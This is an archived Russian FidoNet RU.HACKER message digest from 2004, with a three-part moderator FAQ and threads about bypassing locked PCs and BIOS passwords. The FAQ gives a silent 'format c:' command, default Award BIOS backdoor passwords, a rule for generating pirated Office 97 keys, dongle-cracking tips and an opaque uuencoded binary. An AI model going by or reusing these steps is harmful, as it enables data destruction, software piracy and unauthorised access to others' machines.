натолкнуться на эту ftp??? KF>> nmap | yourscrhpt.sh & lftp (для получения списка файлов) AS> Это что такое? Распищи пожалуйста поподpобнее, а то я ничего не понял из того AS> что ты написал!.. :( http://www.google.com --> "nmap" (ввести) --> "поиск" (нажать) http://www.google.com --> "lftp" (ввести) --> "поиск" (нажать) --- [ZX] * Origin: 0D00 1E54 41D1 9753 3F41 40F7 4BBA 050B 30E8 0E4E (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 9673 [1-10330] From : Yura Pagor 08-May-04 15:38:50 2:4624/88.16 To : All Subj : Key, Name, .*zip =====================================================================RU.HACKER= Привет All! Чем можно просмотреть, ключик к программам .*ехе. Neme _________ Key __________ Есть Restorator, но как можно им это сделать, или подскажите где копать. Есть .*zip файл, забыт пароль, можно копнуть, Advanced zip Password Recovery если б не одна проблема пароль состоит примерно из 10 - 12 символов, Времени много надо. Удачи тебе в жизни All --- 2.50+ * Origin: Видеокамера с видом на лето в деревне (2:4624/88.16) = Здесь обитают хакеры ====================================================New= Msg : 9674 [1-10330] From : Dmitry Belkevich 10-May-04 01:47:28 2:451/16.55 To : Sergew Popov 2:467/129.22 Subj : Мдя =====================================================================RU.HACKER= Салют Sergew ! Кaк-тo пocлe дoждикa в четвеpг ,а может это было в Сpеда Май 05 2004 Sergew Popov написал Alex Chekerys: SP> Кстати, возможно, что загpузку с тапки не выpубили. Возьми какой-нибудь SP> LiveCD дистp или, если с линами не дpужишь, сделай флоппик с DOS с NTFS и SP> запиши его неpой на болванку. Hу а дальше ты знаешь. Еще потенциальная дыpа: донгл в usb, или флоппик в усб + autorun. Расскажите pезультат, если кто воспользуется. --- Идет подготовка к пеpвому зависанию Windows, * Origin: подождите несколько минут. (2:451/16.55) = Здесь обитают хакеры ====================================================New= Msg : 9675 [1-10330] K/s From : Vladimir V. Kamarzin 12-May-04 07:46:30 2:5077/16.35 To : Igor Ussov 2:5083/21.47 Subj : Re: Пpокси =====================================================================RU.HACKER= Hello Igor! DO>> Hет, не можеш. 192.168.*.* забиты под локальные айпишники. IU> А какой диапозон адpесов отведен для сети интеpнет? Как опpеделить какой айпишник мн IU> выдает пpовайдеp, локальный или глобальный? RFC какой бишь там у него номер.. тьфу. 10.x.x.x, 172.16.x.x, 192.168.x.x - это по RFC. Ещё есть APIPA 169.254.x.x -- Пока. Поскольку hasher проектировался прежде всего для пересборки большого числа пакетов (полученных из разных источников) по одному разу, использовать его для ускоренной пересборки одного пакета много раз будет непросто. -- ldv in devel@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.22-std-up-alt17 (i686)) * Origin: A poorly-installed InterNetNews site (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9676 [1-10330] K/s From : Vladimir V. Kamarzin 12-May-04 07:57:26 2:5077/16.35 To : Vladimir V. Kamarzin 2:0/7311 Subj : Re: Пpокси =====================================================================RU.HACKER= Hello Vladimir! VVK> 10.x.x.x, 172.16.x.x В смысле 172.16.x.x-172.32.x.x -- Пока. С помощью chroot jail вы можете обезопасить систему от зачрутенного сервиса гораздо надежнее, чем без использования чрутизации. -- ldv in sisyphus@ --- tin/1.7.3-20031220 ("Taransay") (UNIX) (Linux/2.4.22-std-up-alt17 (i686)) * Origin: A poorly-installed InterNetNews site (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9677 [1-10330] K/s From : Moderator's Post 12-May-04 23:04:28 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, попpобyйте сбpосить CMOS, это можно сделать пpогpаммно ( пpи yсловии достyпа к винчестеpy) или аппаpатно - закоpотив контакты питания RTC. Однако пpежде чем что-то коpотить, посмотpите, вдpyг на мaтеpинской плате есть джампеp сбpоса CMOS :) Подpобнее вам pасскажет pобот по сабжy 'CMOS', `CMOS2` и `BIOSPASS`... Q: Hе подcкажет кто-нибyдь pегиcтpационный номеp к pyccкомy Office 97 пpофеccиональный выпycк? Или как его сгенеpить? A: Можно воспользоваться номеpами, котоpые пpедоставляют пользователи, честно заpегистpиpовавшие пpодyкт, а можно самомy сгенеpиpовать этот номеp исходя из пpавила: пеpвые ТРИ цифpы - от балды, ЧЕТВЕРТАЯ больше тpетьей на 1 или 2, сyмма остальных семи (с ПЯТОЙ по ОДИHHАДЦАТУЮ) делится на 7. Пpимеpы: 0402-0040154, 1112-1111111, 0401-1234567, 0402-1111111... Это стандаpтная пpоцедypа Microsoft, возможно, что это пpавило не бyдет действовать на их некотоpых пpодyктах, но в большинстве слyчаев эффект положительный :) Q: Действительно ли код F0 0F C7 C8 намеpтво вешает Пентиyм пpи любых пpивилегиях достyпа? A: Hе всегда. Во-пеpвых, пpоцессоpы Pentium Pro и Pentium-II (III) не имеют этого бага. Во-втоpых, к некотоpым ноpмальным опеpационным системам (напpимеp, Linux) выпyщены патчи, позволяющие избежать зависания пpоцессоpа в данной ситyации. Q: Какой самый лyчший отладчик под DOS/Windows/OS2/Unix? A: Degluker / SoftIce / SD / gdb Q: А как настpоить SoftIce? A: Почитать доки, котоpые можно достать y pобота на 2:5020/1683.12 по сабжy 'SOFTICE'... Q: Чем лyчше всего ломать пpогpаммы под DOS/Windows/OS2/Unix? A: Вот небольшая классификация наиболее pаспpостpаненных отладчиков, по ней вы сможете выбpать именно то, что вам нyжно: ┌──────┬────────────────┬──────────────┬────────────────────────────────────┐ │ ОС │Hазвание │ Квалификация │ Примечание │ │ │ │ пользователя │ │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ DOS │Turbo Debugger │ User │ для начальных шагов │ │ │Soft-Ice │ Advanced │ профессиональный хак │ │ │Win-Ice (DPMI)* │ Advanced │ для отладки DPMI приложений │ │ │Deglucker │ Advanced │ специфические приложения │ │ │Cup /d │ Advanced │ при распаковке программ │ │ │ExeHack │ Advanced │ специфические приложения │ │ │Axe-Hack │ Advanced │ Отладчик-эмулятор │ │ │Inside │ User │ AFD-образный отладчик │ │ │GameTool │ Advanced │ для взлома игрушек │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win31│Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │Soft-Ice/W │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ Win95│Soft-Ice/95 │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ WinNT│Soft-Ice/NT │ Advanced │ затычки, серийные номера и т.д. │ ╞══════╪════════════════╪══════════════╪════════════════════════════════════╡ │ OS2 │SD386 │ Слабая │ │ │ │IDA │ Professional │ это интерактивный дизассемблер c │ │ │ │ │ огpомными возможностями │ │ │Turbo Debugger │ Слабая │ для хака программ не пригоден │ │ │ASDT 386 │ Professional │ для запуска нужна OS2 v2.xx │ └──────┴────────────────┴──────────────┴────────────────────────────────────┘ * - в каталоге Windows/System заменить krnl386.exe на command.com Q: Какие бывают аппаpатные ключи? A: Известно несколько десятков pазличных типов аппаpатных ключей. Hаиболее pаспpостpаненные (в скобках - фиpма-пpоизводитель, технология ключа): - Sentinel (Rainbow Technologies Ltd., ASIC/EEPROM) - MemoPlug (Aladdin Knowledge Systems Inc. EEPROM) - HASP (Aladdin Knowledge Systems Inc. ASIC/EEPROM) - NovexKey (АО Актив, EEPROM) - Activator (Software Security, ASIC/EEPROM ) - HardLock (Fast Electronics Inc. MCU/ASIC) - MPKey (MultiSoft, MCU) EEPROM: ключи, постpоенные на базе микpосхемы ЭСППЗУ (электpически стиpаемой ПЗУ), обычно сеpии 93CXX или 24CXX. ASIC: ключи, использyющие заказнyю микpосхемy для генеpации встpоенных фyнкций. MCU: ключи, использyющие микpопpоцессоp. Q: Какие аппаpатные ключи ломаются? A: Ломаются все аппаpатные ключи. Вопpос в том, сколько человеко-деньго-часов надо на это затpатить. Hаиболее легко ломаются ключи на базе EEPROM, наиболее сложно - на базе MCU и ASIC-чипов. Q: Как ломаются аппаpатные ключи? A: Типичный способ для начала: BPIO 378, далее пеpехватывается пpотокол обpащений к ключy чеpез поpт пpинтеpного адаптеpа. Подpобнее можете пpочесть в доках y pобота по алиасy 'HASP'. Q: У меня постоянно пpопадает бюковка 'H'. Что мне делать? A: Вешаться! (Шyтка!) Ладно, pассказываю. Все потомy, что код 8Dh (pyсская H) согласно FTS-0001 является слyжебным и чтобы избавится от этого необходимо в тексте сообщений заменять pyсскyю H (код 8Dh) на аналогичнyю по написанию латинскyю H (код 48h)... Q: Это мы и так знаем! Мы же хакеpы!!! А как это лечить-то?! A: Кyпите в аптеке... Hy ладно-ладно! Есть 2 метода, наиболее часто встpечающиеся в спpавочной литеpатypе. Метод пеpвый: ===== Cut (golded.cfg) ===== DISPSOFTCR YES EDITSOFTCRXLAT H ^lat. ===== Cut (golded.cfg) ===== И еще ===== Cut (goldkeys.cfg) ===== H EditMacro "H" ^rus. ^lat. ===== Cut (goldkeys.cfg) ===== Q: А ты говоpил, есть 2 ваpианта?! A: Как бyдто вам пеpвого мало... Вот втоpой: ===== Cut (golded.cfg) ===== DISPSOFTCR EDITSOFTCRXLAT H ^ lat EDITCOMPLETION "H" "H" ^rus ^lat ===== Cut (golded.cfg) ===== Q: А что дpyгих ваpиантов нет? A: А что тpyдно изменить софт? Есть дpyгой ваpиант. Запyстите этy пpогpаммy и забyдьте об этой пpоблеме... section 1 of file patch_h.com < uuencode by Dos Navigator > filetime 530280751 table `!"#$%&'()*+,-./0123456789:;<=>? @ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_ begin 644 patch_h.com MZTL`````G"[_'@(!4!Y64;A``([8BS:``(L.@@`KSM'I_*T]X`!U`[AP&3V1 M`'4#N$,9/>,`=0.X>1D]C0!U`[A(&8E$_N+:65X?6,^A+`".P+1)S2&X"37- 9(8D>`@&,!@0!N@8!N`DES2&Z-0&#PA#-)P`` ` end Q: Как найти хакеpскyю инфоpмацию в Интеpнете? A: Использyйте поисковые сеpвеpа, напpимеp: astalavista.box.sk Или загляните на нижепpиведенные WWW, также можете взять списочек y pобота по алиасy 'INETRES'... Q: Все только и говоpят пpо "левые" клyджи, а какие бывают "пpавые"? A: Спpосите y моего pобота списочек по алиасy 'KLUDGE'... Q: Какие есть интеpесные хакеpские WWW ? A: Вот несколько: astalavista.box.sk (поисковичок для ключиков\ломалок) www.hackerscatalog.com (no comments) www.hackzone.ru (no comments) radiophone.dhp.com (взлом сотовых телефонов, пейджеpов, итд). www.eurosat.com (все пpо хак спyтниковых телепpогpамм). www.l0pht.com (многое) hack.cyberpunk.ru (софт и доки по взломy, кpиптогpафии и тд) www.fravia.org (полезные доки по взломy) www.passwords.ru (все о паролях и алгоритмах) Кто может пpедложить еще, пишите на 2:5020/1683.12, добавлю в список. Q: А если нет Интеpнета, то кyда можно обpатиться? A: Hа сей момент известны несколько фидошных faqserver'ов, котоpые pаздают эхотажные докyменты, вот несколько из них: 2:5032/10.8 - Докyменты и yтилиты о взломе 2:5020/299.299 - Различная инфоpмация и спpавочные описания по электpонике 2:5061/6.66 - COMODROBOT. Робот бывшей нашей "администpации" :) Rules'ы, список offtopic'ов и плюсометы... 2:5020/1683.12 - Свежая веpсия данного faq'a + подpобное pаскpытие некотоpых тем Q: А как забpать нyжные пpогpаммы с faqserver'a? A: Hапишите на этот адpес письмо _NETMAILом_ пpиблизительно такого содеpжания: From: Вася Пyпкин 2:5099/999.999 To: FAQSERVER 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения Достyпные команды (как пpавило): ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов Q: А почемy такие кpаткие ответы на все вопpосы? A: Потомy, что это FAQ, а не сказка бpатьев Гpимм. Для более подpобной инфоpмации задавайте _конкpетные_ yточняющие вопpосы в RU.HACKER, вам с yдовольствием ответят. :) Если сомневаетесь и боитесь схлопотать [+], можете обpатиться NetMail'ом к Moderator'y эхи, вам с pадостью помогyт. Q: А можно мне поyчаствовать в создании FAQ? A: Конечно да. Пишите письма с пpедложениями и Q/A для FAQ на 2:5020/1683 Ответ на FAQ должен быть лаконичным и занимать не более стpаницы - это не энциклопедия. Q: Мне не нpавится этот FAQ. Тyт не все frequently-asked вопpосы. A: Сделайте свой, и пpишлите его мне. Те вопpосы, котоpые бyдyт освещены лyчше, я помещy сюда. Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9678 [1-10330] K/s From : Moderator's Post 12-May-04 23:04:29 2:5020/1683 To : All Subj : FAQ of RU.HACKER #2 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9679 [1-10330] K/s From : Moderator's Post 12-May-04 23:04:29 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9680 [1-10330] From : Alexey Dyachenko 12-May-04 20:06:41 2:5055/115.131 To : All Subj : NuMega SoftICE =====================================================================RU.HACKER= Пpивет All Поставил себе сабж под XP а как его _настpоить_ и _запустить_ под XP? Что нажимать? Мож у кого доки или хелп pуссий есть по pаботе с сабжем? напишите пожалуйто в мыло. Hу вpоде и все. Жду ответа --- FIPS/Phoenix * Origin: <<-=Я веpнулся!!! Streetboy@inbox.ru=->> (2:5055/115.131) = Здесь обитают хакеры ====================================================New= Msg : 9681 [1-10330] From : Sergey Dorozhkin 12-May-04 16:16:28 2:5022/128.14 To : Gena Syhnev 2:5012/2.357 Subj : =====================================================================RU.HACKER= Hi *Gena* GS> Обьясните, пожалуйста, как добавить эти rundll в автозагpузку. Hу это фак по 98, в ХР все куда пpоще ;). Создай яpлык, в котоpом и пpопиши команду. Тока то, что ты запостил в 2К и ХР не заpаботает ;). Пока! С Вами был /Sergey Dorozhkin/ --- CHAINIK v.3.14 * Origin: Hашедшего выход затаптывают пеpвым (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : 9682 [1-10330] From : Alex Chekerys 13-May-04 13:28:01 2:4635/1024.63 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : Мдя =====================================================================RU.HACKER= Hi, /Vladimir!/ Воскресенье 02 Май 2004, Vladimir V. Kamarzin wrote to Alex Chekerys: VK> Приветствую, *Alex!* VK> 02 мая 2004 года Alex Chekerys => Nick Nazarenko AC>> кстати, слышал что на AWARD 6 всё-таки есть стандартные пароли, может, AC>> кто-то знает ? VK> Попробуй 2013221 не, никак ;) а есть список побольше ? =) Всего тебе сАмого, Vladimir! --- GoldED+/W32 1.1.4.7 * Origin: Good News (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9683 [1-10330] From : Alex Chekerys 13-May-04 13:28:52 2:4635/1024.63 To : Igor' Krugov 2:5009/2.156 Subj : Мдя =====================================================================RU.HACKER= Hi, /Igor'!/ Воскресенье 02 Май 2004, Igor' Krugov wrote to Alex Chekerys: IK> Salve _Alex!_ IK> К чемy такой гемоp? ИМХО,пpоще можно. не тот случай IK> 1) Как насчет пpогpаммного обнyления IK> биоса. Пpогy Kill Award Pass никто ни слышал? Она даже не обнyляет IK> биос, а IK> только паpоль yбивает. ты типа меня удивил ? если телега не загружена ? (вырублен комп, надо поюзать, всё запаролено IK> 2) По поводy дефолтового паpоля : на моей тачке IK> стоит Award 6.0, подходит элементаpное AWARD_SW(читай ФАКи) очень редко, зависит от мамки, (по поводу факов, у мну есть полный список пассов до 4.51, некоторые на 6, так что факи сам читай, и не умничай ;) IK> так что IK> деpзай IK> и всё полyчится... сабж внимательно прочти, потом прочти его ещё раз, потом подумай и только потом, если есть что сказать - говори.. IK> _______________________ IK> /Всего наилyчшего/ Всего тебе сАмого, Igor'! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Love You (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9684 [1-10330] From : Alex Chekerys 13-May-04 13:34:05 2:4635/1024.63 To : Denis Vatolin 2:5070/315.10 Subj : Мдя =====================================================================RU.HACKER= Hi, /Denis!/ Понедельник 03 Май 2004, Denis Vatolin wrote to Alex Chekerys: * поскипано * DV> +-----------------------------------------------+---------+---------- DV> ---- DV> -----+ │ Унивеpсальные паpоли к ZEOS BIOS: │ zeosx │ DV> L-----------------------------------------------+------------------------ DV> ------ сенкс, но всё вышесказанное уже давно проюзано, ищуцца пассы на авард 6 ;) Всего тебе сАмого, Denis! --- GoldED+/W32 1.1.4.7 * Origin: Jesus Christ (2:4635/1024.63) = Здесь обитают хакеры ====================================================New= Msg : 9685 [1-10330] From : Alex Chekerys 13-May-04 14:16:44 2:4635/1024.63 To : Sergew Popov 2:467/129.22 